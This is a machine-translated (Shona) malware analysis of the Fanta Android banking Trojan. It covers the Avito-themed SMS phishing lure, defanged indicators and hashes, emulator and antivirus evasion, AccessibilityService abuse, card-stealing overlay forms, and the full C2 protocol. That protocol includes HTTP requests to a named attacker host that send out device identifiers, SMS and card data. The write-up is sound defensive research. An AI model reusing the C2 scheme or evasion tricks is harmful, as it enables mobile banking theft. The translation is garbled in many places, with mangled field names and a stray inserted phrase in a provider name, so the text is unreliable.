Rimwe zuva iwe unoda kutengesa chimwe chinhu paAvito uye, watumira tsananguro yakadzama yechigadzirwa chako (semuenzaniso, RAM module), uchagamuchira iyi meseji:
Kana uchinge wavhura chinongedzo, uchaona peji rinoratidzika kunge risina mhosva richikuzivisa iwe, mutengesi anofara uye akabudirira, kuti kutenga kwaitwa:
Paunenge uchinge wadzvanya bhatani rekuti "Rambai", faira reAPK rine chiratidzo uye zita rinokurudzira-ruvimbo richatorwa kune yako Android kifaa. Iwe wakaisa application iyo nekuda kwechimwe chikonzero yakakumbira AccessibilityService kodzero, zvino akati wandei mahwindo akaonekwa uye nekukasira kunyangarika uye... Ndizvozvo.
Iwe unoenda kunotarisa chiyero chako, asi nekuda kwechimwe chikonzero app yako yekubhengi inokumbira ruzivo rwekadhi rako zvakare. Mushure mekupinda iyo data, chimwe chinhu chinotyisa chinoitika: nekuda kwechimwe chikonzero zvichiri kujeka kwauri, mari inotanga kunyangarika kubva kuaccount yako. Uri kuyedza kugadzirisa dambudziko, asi foni yako inopokana: inodzvanya makiyi ekuti "Kumashure" uye "Kumba", haidzimi uye haibvumire kuti uite chero matanho ekuchengetedza. Somugumisiro, iwe wakasara usina mari, zvinhu zvako hazvina kutengwa, unovhiringidzika uye unoshamisika: chii chakaitika?
Mhinduro iri nyore: wave mubatwa weiyo Android Trojan Fanta, nhengo yemhuri yeFlexnet. Izvi zvakaitika sei? Ngatitsanangurei zvino.
Vanyori: Andrey Polovinkin, junior nyanzvi mukuongorora malware, Ivan Pisarev, nyanzvi yekuongorora malware.
Dzimwe nhamba
Mhuri yeFlexnet yeAndroid Trojans yakatanga kuzivikanwa kumashure muna 2015. Kwenguva yakareba yakareba yebasa, mhuri yakawedzera kune akati wandei subspecies: Fanta, Limebot, Lipton, nezvimwe. Iyo Trojan, pamwe chete nezvivakwa zvakabatana nazvo, haimire: zvirongwa zvitsva zvinobudirira zvekugovera zviri kuvandudzwa - kwatiri isu, emhando yepamusoro mapeji ehutsotsi anonangwa kune akasarudzika mushandisi-mutengesi, uye vagadziri veTrojan vanotevera mafashoni. hutachiona hwekunyora - kuwedzera hutsva hunoita hunoita kuti zvikwanise kuba mari inobudirira kubva kumidziyo ine hutachiona uye nzira dzekudzivirira.
Mushandirapamwe unotsanangurwa muchinyorwa chino wakanangana nevashandisi vanobva kuRussia; nhamba shoma yemidziyo ine hutachiona yakanyorwa muUkraine, uye kunyange vashoma muKazakhstan neBelarus.
Kunyangwe Flexnet yanga iri muAroid Trojan arena kweanopfuura makore 4 ikozvino uye yakadzidzwa zvakadzama nevaongorori vazhinji, ichiri muchimiro chakanaka. Kutanga kubva muna Ndira 2019, huwandu hunogona kukanganisa hunopfuura 35 miriyoni rubles - uye izvi ndezvemushandirapamwe muRussia. Muna 2015, shanduro dzakasiyana-siyana dzeiyi Android Trojan dzakatengeswa pamaforamu epasi, apo iyo kodhi yeTrojan ine tsananguro yakadzama inogona kuwanikwa zvakare. Izvi zvinoreva kuti nhamba dzekukuvara munyika dzinotoshamisa. Kwete chiratidzo chakaipa kumurume mukuru akadaro, handizvo here?
Kubva pakutengesa kusvika pakunyengedza
Sezvingaonekwa kubva pane yakamboratidzwa skrini yepeji ye phishing yeInternet sevhisi yekutumira ads Avito, yakagadzirirwa munhu akabatwa. Sezviri pachena, vanorwisa vanoshandisa imwe yeAvito's parsers, iyo inobvisa nhamba yefoni uye zita remutengesi, pamwe chete nekutsanangurwa kwechigadzirwa. Mushure mekuwedzera peji uye kugadzirira iyo APK faira, munhu anenge abatwa anotumirwa SMS ine zita rake uye chinongedzo kune phishing peji ine tsananguro yechigadzirwa chake uye mari yakagamuchirwa kubva "kutengesa" kwechigadzirwa. Nekudzvanya bhatani, mushandisi anogamuchira yakashata APK faira - Fanta.
Ongororo ye shcet491[.]ru domain yakaratidza kuti inopihwa kune Hostinger's DNS maseva:
- ns1.hostinger.ru
- ns2.hostinger.ru
- ns3.hostinger.ru
- ns4.hostinger.ru
Iyo domain zone file ine zvinyorwa zvinonongedza kukero dzeIP 31.220.23[.]236, 31.220.23[.]243, ne31.220.23[.]235. Zvakadaro, iyo domain's primary resource rekodhi (A rekodhi) inonongedza kune server ine IP kero 178.132.1[.]240.
IP kero 178.132.1[.]240 iri kuNetherlands uye ndeyemugadziri. Vadivelu Comedy WorldStream. IP kero 31.220.23[.]235, 31.220.23[.]236 uye 31.220.23[.]243 dziri muUK uye ndedzeiyo yakagovaniswa hosting server. Inoshandiswa serekodha openprov-ru. Aya madhomeini anotevera akagadziriswa kukero yeIP 178.132.1[.]240:
- sdelka-ru[.]ru
- tovar-av[.]ru
- av-tovar[.]ru
- ru-sdelka[.]ru
- shcet382[.]ru
- sdelka221[.]ru
- sdelka211[.]ru
- vyplata437[.]ru
- viplata291[.]ru
- perevod273[.]ru
- perevod901[.]ru
Izvo zvinofanirwa kucherechedzwa kuti zvinongedzo mune inotevera fomati yaivepo kubva kunenge ese madomasi:
http://(www.){0,1}<%domain%>/[0-9]{7}
Iyi template inosanganisirawo chinongedzo kubva kune meseji yeSMS. Kubva pane nhoroondo yezvakaitika kare, zvakaonekwa kuti imwe nzvimbo inopindirana nezvikamu zvakasiyana-siyana mumuenzaniso wakatsanangurwa pamusoro apa, izvo zvinoratidza kuti imwe nzvimbo yakashandiswa kugovera Trojan kune vakawanda vakaurayiwa.
Ngatisvetukire mberi zvishoma: iyo Trojan yakatorwa kuburikidza nekubatanidza kubva kuSMS inoshandisa kero sevhavha yekudzora. onuseseddohap[.]club. Iyi domain yakanyoreswa muna 2019-03-12, uye kutanga kubva 2019-04-29, APK maapplication akabatana neiyi domain. Kubva pane data rakawanikwa kubva kuVirusTotal, huwandu hwe109 maapplication akabatana neiyi server. Iyo domain pachayo yakagadziriswa kune IP kero 217.23.14[.]27, iri muNetherlands uye ndeyamuridzi Vadivelu Comedy WorldStream. Inoshandiswa serekodha namecheap. Domains zvakare yakagadziriswa kune iyi IP kero bad-racoon[.]club (kutanga kubva 2018-09-25) uye bad-racoon[.]live (kubva 2018-10-25). With domain bad-racoon[.]club anopfuura 80 APK mafaera akabatanidzwa nawo bad-racoon[.]live - zvinopfuura 100.
Kazhinji, kurwisa kunofambira mberi sezvinotevera:
Chii chiri pasi pechivharo cheFanta?
Kufanana nemamwe akawanda maTrojans eAroid, Fanta inokwanisa kuverenga uye kutumira mameseji eSMS, kuita zvikumbiro zveUSSD, uye kuratidza yayo windows pamusoro pezvikumbiro (kusanganisira zvebhangi). Nekudaro, iyo arsenal yekushanda kwemhuri iyi yasvika: Fanta akatanga kushandisa AccessibilityService nokuda kwezvinangwa zvakasiyana-siyana: kuverenga zviri mukati mezviziviso kubva kune mamwe maapplication, kudzivirira kuonekwa uye kumisa kuurayiwa kweTrojan pamudziyo une utachiona, nezvimwewo. Fanta inoshanda pane ese mavhezheni eAndroid asiri pasi pe4.4. Muchinyorwa chino ticha nyatso tarisisa pane inotevera Fanta sampuli:
- MD5: 0826bd11b2c130c4c8ac137e395ac2d4
- SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
- SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb
Pakarepo mushure mekutanga
Pakarepo mushure mekutanga, iyo Trojan inovanza icon yayo. Chishandiso chinogona kungoshanda chete kana zita remudziyo une hutachiona usiri mune rondedzero:
- Android_x86
- Virtualbox
- Nexus 5X (musoro webhuru)
- Nexus 5(reza)
Cheki iyi inoitwa musevhisi huru yeTrojan - MainService. Kana yatangwa kekutanga, magadzirirwo echishandiso anotangwa kune default kukosha (iyo fomati yekuchengetedza data yekumisikidza uye zvazvinoreva zvichakurukurwa gare gare), uye mudziyo mutsva une hutachiona unonyoreswa pane control server. Chikumbiro cheHTTP POST chine mhando yemeseji chichatumirwa kuseva register_bot uye ruzivo nezve mudziyo une hutachiona (Android vhezheni, IMEI, nhamba yefoni, zita remushandisi uye kodhi yenyika umo mushandisi akanyoreswa). Kero inoshanda sevhavha yekudzora hXXp://onuseseddohap[.]club/controller.php. Mukupindura, sevha inotumira meseji ine minda bot_id, bot_pwd, Server - Chishandiso chinochengetedza izvi zvakakosha semaparamita eCnC server. Parameter Server sarudzo kana munda usina kugamuchirwa: Fanta inoshandisa kero yekunyoresa - hXXp://onuseseddohap[.]club/controller.php. Basa rekushandura kero yeCnC rinogona kushandiswa kugadzirisa matambudziko maviri: kugovera mutoro zvakaenzana pakati pemasevha akati wandei (kana paine huwandu hukuru hwemidziyo ine hutachiona, mutoro uri pawebhu isina kugadziridzwa server unogona kunge wakakwira), uye zvakare kushandisa. imwe sevha kana pane kutadza kweimwe yeCnC maseva.
Kana kukanganisa kukaitika paunenge uchitumira chikumbiro, iyo Trojan inodzokorora maitiro ekunyoresa mushure memasekondi makumi maviri.
Kana mudziyo uchinge wanyoreswa zvakabudirira, Fanta inoratidza inotevera meseji kumushandisi:
Chinyorwa chakakosha: sevhisi yakadanwa System Security - zita rebasa reTrojan, uye mushure mekudzvanya bhatani OK Hwindo rinovhurika neKuwanikwa zvigadziriso zvechishandiso chine hutachiona, uko mushandisi anofanirwa kupa kodzero dzekusvikika kwesevhisi yakaipa:
Pakarepo mushandisi anobatidza AccessibilityService, Fanta inowana mukana kune zviri mukati mahwindo ekushandisa uye zviito zvinoitwa mazviri:
Pakarepo mushure mekugamuchira kodzero dzekusvikika, iyo Trojan inokumbira kodzero dzemaneja uye kodzero dzekuverenga zviziviso:
Uchishandisa iyo AccessibilityService, chishandiso chinotevedzera makiyi, nekudaro ichizvipa kodzero dzese dzinodiwa.
Fanta inogadzira akawanda dhatabhesi zviitiko (izvo zvinozotsanangurwa gare gare) zvakakosha kuchengetedza data yekumisikidza, pamwe neruzivo rwakaunganidzwa mukuita nezve mudziyo une hutachiona. Kuti utumire ruzivo rwakaunganidzwa, iyo Trojan inogadzira inodzokorora basa rakagadzirirwa kurodha minda kubva kudhatabhesi uye kugamuchira murairo kubva kune control server. Iyo nguva yekuwana CnC inotarwa zvichienderana neiyo Android vhezheni: muchiitiko che5.1, nguva yacho ichava masekonzi gumi, kana zvisina kudaro masekonzi makumi matanhatu.
Kuti ugamuchire murairo, Fanta anoita chikumbiro GetTask kune manejimendi server. Mukupindura, CnC inogona kutumira imwe yemirairo inotevera:
| chikwata | tsananguro |
|---|---|
| 0 | Tumira SMS meseji |
| 1 | Ita runhare kana USSD kuraira |
| 2 | Inogadziridza parameter chinguva |
| 3 | Inogadziridza parameter bvisa |
| 6 | Inogadziridza parameter smsManager |
| 9 | Tanga kuunganidza mameseji eSMS |
| 11 | Reset foni yako kumasettings efekitari |
| 12 | Gonesa/Dzivisa kutema kwedialog box kugadzira |
Fanta inounganidzawo zviziviso kubva ku70 banking apps, kukurumidza kubhadhara masisitimu uye e-wallet uye inozvichengeta mudhatabhesi.
Kuchengeta zvigadziriso zvimiro
Kuchengetedza zvigadziriso zvigadziriso, Fanta inoshandisa yakajairwa nzira yeiyo Android chikuva - Zvaunogona Kuchinja-mafaira. Zvirongwa zvichachengetwa kune faira rine zita kurongwa. Tsananguro yemaparamita akachengetwa iri mutafura iri pazasi.
| zita | Default value | Zvinogoneka tsika | tsananguro |
|---|---|---|---|
| id | 0 | Integer | Bot ID |
| Server | hXXp://onuseseddohap[.]club/ | URL | Kudzora server kero |
| pwd | - | tambo | Server password |
| chinguva | 20 | Integer | Nguva yenguva. Inoratidza kuti mabasa anotevera anofanira kumbomiswa kwenguva yakareba sei:
|
| bvisa | zvose | zvese/telNumber | Kana munda wakaenzana netambo zvose kana telNumber, ipapo iyo yakagamuchirwa meseji yeSMS inotambirwa neapp uye isina kuratidzwa kumushandisi |
| smsManager | 0 | 0/1 | Gonesa/dzima chishandiso seyekugadzika SMS inogamuchira |
| readDialog | venhema | Chokwadi nhema | Gonesa/Dzinga kutema chiitiko AccessibilityEvent |
Fanta inoshandisawo faira smsManager:
| zita | Default value | Zvinogoneka tsika | tsananguro |
|---|---|---|---|
| pckg | - | tambo | Zita reSMS meseji maneja rakashandiswa |
Kudyidzana nemadatabase
Munguva yekushanda kwayo, iyo Trojan inoshandisa dhatabhesi mbiri. Database yakanzi a inoshandiswa kuchengetedza ruzivo rwakasiyana-siyana rwakaunganidzwa kubva mufoni. Yechipiri dhatabhesi inonzi fanta.db uye inoshandiswa kuchengetedza zvigadziriso zvine chekuita nekugadzira phishing windows yakagadzirirwa kuunganidza ruzivo nezvemakadhi ekubhangi.
Trojan inoshandisa database а kuchengetedza ruzivo rwakaunganidzwa uye kunyora zviito zvako. Data inochengetwa mutafura matanda. Kugadzira tafura, shandisa inotevera SQL mubvunzo:
create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)Iyo database ine ruzivo rwunotevera:
1. Kutema kutanga kwechinhu chine utachiona neshoko Runhare rwakabatidzwa!
2. Zviziviso kubva kune zvikumbiro. Iyo meseji inogadzirwa zvinoenderana neinotevera template:
(<%App Name%>)<%Title%>: <%Notification text%>
3. Data yekadhi rebhangi kubva kumafomu ephishing akagadzirwa neTrojan. Parameter VIEW_NAME inogona kuva imwe yeinotevera:
- AliExpress
- Avito
- Google Play
- Zvimwe <%App Name%>
Mharidzo yacho yakanyorwa mufomati:
[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>
4. Mameseji eSMS anouya/anobuda mufomati:
([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящее/Исходящее) <%Mobile number%>:<%SMS-text%>
5. Ruzivo nezvepasuru inogadzira bhokisi renhaurirano mufomati:
(<%Package name%>)<%Package information%>
Muenzaniso tafura matanda:
Imwe yekushanda kweFanta kuunganidzwa kweruzivo nezvemakadhi ekubhangi. Kuunganidzwa kwedata kunoitika kuburikidza nekugadzirwa kwephishing windows pakuvhura mabhengi maapplication. Iyo Trojan inogadzira iyo phishing hwindo kamwe chete. Ruzivo rwekuti hwindo rakaratidzwa kumushandisi rinochengetwa mutafura kurongwa mune dhatabhesi fanta.db. Kugadzira dhatabhesi, shandisa inotevera SQL mubvunzo:
create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);Minda yese yematafura kurongwa nekusarudzika inotangwa ku1 (gadzira hwindo rekubira). Mushure mekunge mushandisi apinda data yavo, kukosha kuchaiswa ku 0. Muenzaniso weminda yetafura kurongwa:
- can_login - munda une basa rekuratidza fomu pakuvhura bhengi
- first_bank - isina kushandiswa
- anogona_avito - munda une basa rekuratidza fomu pakuvhura iyo Avito application
- can_ali - munda une basa rekuratidza fomu kana uchivhura Aliexpress application
- anogona_mumwe - munda une basa rekuratidza fomu kana uchivhura chero application kubva pane rondedzero: Yula, Pandao, Drom Auto, Wallet. Discount uye bhonasi makadhi, Aviasales, Booking, Trivago
- can_card - munda une basa rekuratidza fomu pakuvhura Google Play
Kudyidzana ne manejimendi server
Kudyidzana kwenetiweki neye manejimendi server kunoitika kuburikidza neHTTP protocol. Kushanda netiweki, Fanta inoshandisa raibhurari yakakurumbira yeRetrofit. Zvikumbiro zvinotumirwa ku: hXXp://onuseseddohap[.]club/controller.php. Sevha kero inogona kuchinjwa paunenge uchinyoresa pane server. Makuki anogona kutumirwa semhinduro kubva kuseva. Fanta anoita zvinotevera zvikumbiro kune server:
- Kunyoreswa kwebhot pane control server kunoitika kamwe chete, pakatanga kutanga. Iyo inotevera data nezve mudziyo une hutachiona inotumirwa kuseva:
· Cookie - makuki akagamuchirwa kubva kuseva (default value itambo isina chinhu)
· rudzi - tambo inogara register_bot
· chivakashure - integer constant 2
· version_sdk - inoumbwa zvinoenderana neiyo inotevera template: <%Build.MODEL%>/<%Build.VERSION.RELEASE%>(Avit)
· imei - IMEI yechinhu chine hutachiona
· nyika - kodhi yenyika iyo mushandisi akanyoreswa, mune ISO fomati
· nhamba - nhamba yenhare
· opareta - zita remushandisiMuenzaniso wechikumbiro chakatumirwa kuseva:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Content-Length: 144 Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>Mukupindura chikumbiro, sevha inofanirwa kudzosera chinhu cheJSON chine zvinotevera paramita:
· bot_id - ID yemudziyo une hutachiona. Kana bot_id yakaenzana ne0, Fanta ichaita zvakare chikumbiro.
bot_pwd - password ye server.
server - control server kero. Optional parameter. Kana iyo parameter isina kutaurwa, kero yakachengetwa mukushandisa ichashandiswa.Muenzaniso JSON chinhu:
{ "response":[ { "bot_id": <%BOT_ID%>, "bot_pwd": <%BOT_PWD%>, "server": <%SERVER%> } ], "status":"ok" }
- Kumbira kugamuchira murairo kubva kune server. Iyo inotevera data inotumirwa kune server:
· Cookie - makuki akagamuchirwa kubva kuseva
· bhidha - id yemudziyo une hutachiona wakagamuchirwa pakutumira chikumbiro register_bot
· pwd - password ye server
· divice_admin - munda unoona kana kodzero dzemutungamiri dzakawanikwa. Kana kodzero dzemutungamiri dzawanikwa, munda wakaenzana ne 1, zvimwe 0
· Accessibility -Kuwanika Sevhisi kushanda mamiriro. Kana sevhisi yakatangwa, kukosha kwacho 1, zvimwe 0
· SMSManager - inoratidza kana iyo Trojan inogoneswa seyekutanga application yekugamuchira SMS
· sikirini - inoratidza mamiriro akaita skrini. Kukosha kuchaiswa 1, kana iyo skrini yakabatidzwa, neimwe nzira 0;Muenzaniso wechikumbiro chakatumirwa kuseva:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>Zvichienderana nemurairo, sevha inogona kudzosa chinhu cheJSON chine ma parameter akasiyana:
· chikwata Tumira SMS meseji: Maparamita ane nhamba yefoni, mameseji eSMS meseji uye ID yemeseji iri kutumirwa. Chiziviso chinoshandiswa pakutumira meseji kune server ine mhando setSmsStatus.
{ "response": [ { "mode": 0, "sms_number": <%SMS_NUMBER%>, "sms_text": <%SMS_TEXT%>, "sms_id": %SMS_ID% } ], "status":"ok" }· chikwata Ita runhare kana USSD kuraira: Nhamba yefoni kana murairo unouya mumutumbi wekupindura.
{ "response": [ { "mode": 1, "command": <%TEL_NUMBER%> } ], "status":"ok" }· chikwata Shandura interval parameter.
{ "response": [ { "mode": 2, "interval": <%SECONDS%> } ], "status":"ok" }· chikwata Chinja intercept parameter.
{ "response": [ { "mode": 3, "intercept": "all"/"telNumber"/<%ANY_STRING%> } ], "status":"ok" }· chikwata Shandura SmsManager ndima.
{ "response": [ { "mode": 6, "enable": 0/1 } ], "status":"ok" }· chikwata Unganidza mameseji eSMS kubva kune ine hutachiona.
{ "response": [ { "mode": 9 } ], "status":"ok" }· chikwata Reset foni yako kumasettings efekitari:
{ "response": [ { "mode": 11 } ], "status":"ok" }· chikwata Chinja ReadDialog parameter.
{ "response": [ { "mode": 12, "enable": 0/1 } ], "status":"ok" }
- Kutumira meseji ine mhando setSmsStatus. Ichi chikumbiro chinoitwa mushure mekunge murairo waitwa Tumira SMS meseji. Chikumbiro chinoita seizvi:
POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0
mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>- Kuisa zviri mukati me database. Mutsetse mumwe unofambiswa pane chikumbiro. Iyo inotevera data inotumirwa kune server:
· Cookie - makuki akagamuchirwa kubva kuseva
· rudzi - tambo inogara setSaveInboxSms
· bhidha - id yemudziyo une hutachiona wakagamuchirwa pakutumira chikumbiro register_bot
· chinyorwa - zvinyorwa mune yazvino dhatabhesi rekodhi (munda d kubva patafura matanda mune dhatabhesi а)
· nhamba - zita rekodhi razvino rekodhi (munda p kubva patafura matanda mune dhatabhesi а)
· sms_mode - nhamba yakakwana (munda m kubva patafura matanda mune dhatabhesi а)Chikumbiro chinoita seizvi:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>Kana yakabudirira kutumirwa kuseva, mutsara uchabviswa patafura. Muenzaniso wechinhu cheJSON chakadzoserwa neseva:
{ "response":[], "status":"ok" }
Kudyidzana neAccessibilityService
AccessibilityService yakaitwa kuti Android midziyo zvive nyore kushandisa kune vakaremara. Muzviitiko zvakawanda, kushamwaridzana kwemuviri kunodiwa kuti uwirirane nechikumbiro. AccessibilityService inokutendera kuti uzviite zvine hurongwa. Fanta inoshandisa sevhisi kugadzira mahwindo emanyepo mumabhangi maapplication uye kudzivirira vashandisi kubva kuvhura masisitimu masisitimu uye mamwe maapplication.
Ichishandisa mashandiro eiyo AccessibilityService, iyo Trojan inotarisisa shanduko kune zvinhu pachiratidziro chechinhu chine hutachiona. Sezvakatsanangurwa kare, iyo Fanta marongero ane parameter ine chekuita nekutema mabasa nemabhokisi enhaurirano - readDialog. Kana iyi parameter yaiswa, ruzivo nezve zita uye tsananguro yepakeji yakakonzeresa chiitiko ichawedzerwa kune dhatabhesi. Iyo Trojan inoita zvinotevera zviito kana zviitiko zvatanga:
- Inoteedzera kudzvanya makiyi ekuseri uye ekumba mune anotevera kesi:
· kana mushandisi achida kutangazve mudziyo wake
· kana mushandisi achida kudzima "Avito" application kana kushandura kodzero dzekuwana
· kana paine kutaurwa kwe "Avito" application pane peji
· paunovhura iyo Google Play Dzivirira application
· paunovhura mapeji ane AccessibilityService marongero
· panoonekwa System Security dialog box
· paunovhura peji ine "Dhiza pamusoro peimwe app" marongero
· paunovhura peji re "Applications", "Kudzoreredza uye gadzirisa", "Data reset", "Reset marongero", "Developer panel", "Special. mikana”, “Special mikana”, “Special rights”
· kana chiitiko chakagadzirwa nemamwe maapplication.Rondedzero yezvikumbiro
- Android
- Master Lite
- Akachena tenzi
- Yakachena Master ye x86 CPU
- Meizu Application Permission Management
- MIUI Security
- Yakachena Master - Antivirus & Cache uye Garbage Cleaner
- Kudzora kwevabereki uye GPS: Kaspersky SafeKids
- Kaspersky Antivirus AppLock uye Webhu Chengetedzo Beta
- Virus Cleaner, Antivirus, Cleaner (MAX Security)
- Mobile AntiVirus Security PRO
- Avast antivirus & yemahara dziviriro 2019
- Mobile Security MegaFon
- AVG Dziviriro yeXperia
- Mobile Security
- Malwarebytes Antivirus & Dziviriro
- Antivirus ye Android 2019
- Chengetedzo Master - Antivirus, VPN, AppLock, Booster
- AVG antivirus yeHuawei piritsi System Manager
- Samsung Accessibility
- Samsung Smart Manager
- Security Master
- Speed Booster
- Dr. Webhu
- Dr. Webhusaiti Yekuchengetedza Nzvimbo
- Dr.Web Mobile Control Center
- Dr.Web Security Space Life
- Dr.Web Mobile Control Center
- Antivirus & Mobile Security
- Kaspersky Internet Security: Antivirus uye Dziviriro
- Kaspersky Bhatiri Hupenyu: Saver & Booster
- Kaspersky Endpoint Security - kudzivirira uye manejimendi
- AVG Antivirus yemahara 2019 - Dziviriro ye Android
- Android antivirus
- Norton Mobile Security uye Antivirus
- Antivirus, firewall, VPN, nhare chengetedzo
- Mobile Security: antivirus, VPN, kudzivirira kuba
- Antivirus ye Android
- Kana mvumo ikakumbirwa paunenge uchitumira meseji yeSMS kunhamba pfupi, Fanta inotevedzera kudzvanya pabhokisi rekutarisa Rangarira sarudzo uye bhatani tumira.
- Paunoyedza kubvisa kodzero dzemaneja kubva kuTrojan, inovhara iyo skrini yefoni.
- Inodzivirira kuwedzera vatariri vatsva.
- Kana iyo antivirus application dr.web aona kutyisidzira, Fanta anotevedzera kudzvanya bhatani ignore.
- Iyo Trojan inoteedzera kudzvanya bhatani rekuseri uye repamba kana chiitiko chakagadzirwa nechishandiso Samsung Device Care.
- Fanta inogadzira mahwindo ephishing ane mafomu ekuisa ruzivo nezvemakadhi ekubhangi kana application kubva pane rondedzero yemakumi matatu akasiyana eInternet services yakatangwa. Pakati pavo: AliExpress, Booking, Avito, Google Play Market Component, Pandao, Drom Auto, nezvimwe.
Phishing Forms
Fanta inoongorora kuti ndeapi maapplication ari kushanda pamudziyo une hutachiona. Kana chikumbiro chekufarira chakavhurwa, iyo Trojan inoratidza phishing hwindo pamusoro pevamwe vese, inova fomu yekupinda ruzivo rwekadhi rebhangi. Mushandisi anofanira kuisa data rinotevera:
- Kadhi nhamba
- Kadhi kupera kushanda
- CVV
- Zita remuridzi wemakadhi (kwete remabhangi ese)
Zvichienderana nekushanda kwekushandisa, mahwindo akasiyana ephishing acharatidzwa. Pazasi pane mienzaniso yemamwe acho:
Aliexpress
Avito:
Kune mamwe maapplication, e.g. Google Play Musika, Aviasales, Pandao, Booking, Trivago:
Zvaive sei chaizvo
Neraki, munhu akagamuchira meseji yeSMS yakatsanangurwa pakutanga kwechinyorwa akazove nyanzvi yecybersecurity. Nokudaro, shanduro chaiyo, isiri-director yakasiyana kubva kune yakambotaurwa kare: munhu akagamuchira SMS inofadza, mushure mokunge aipa kune boka-IB Threat Hunting Intelligence team. Mhedzisiro yekurwiswa inyaya ino. Kupera kunofadza, handiti? Zvisinei, haisi nyaya dzose dzinopera zvakabudirira, uye kuitira kuti yako irege kutaridzika semutungamiri akachekwa nekurasikirwa nemari, muzviitiko zvakawanda zvakakwana kutevedzera mitemo yakatsanangurwa kwenguva refu:
- usaise maapplication enharembozha ine Android OS kubva kune chero masosi kunze kweGoogle Play
- Paunenge uchiisa application, nyatso tarisa kune kodzero dzakakumbirwa nechishandiso
- teerera kune mawedzero emafaira akatorwa
- isa Android OS inogadziridza nguva nenguva
- usashanyire zviwanikwa zvinofungirwa uye usatore mafaera kubva ipapo
- Usadzvanya pane zvinongedzo zvakagamuchirwa muSMS meseji.
Source: www.habr.com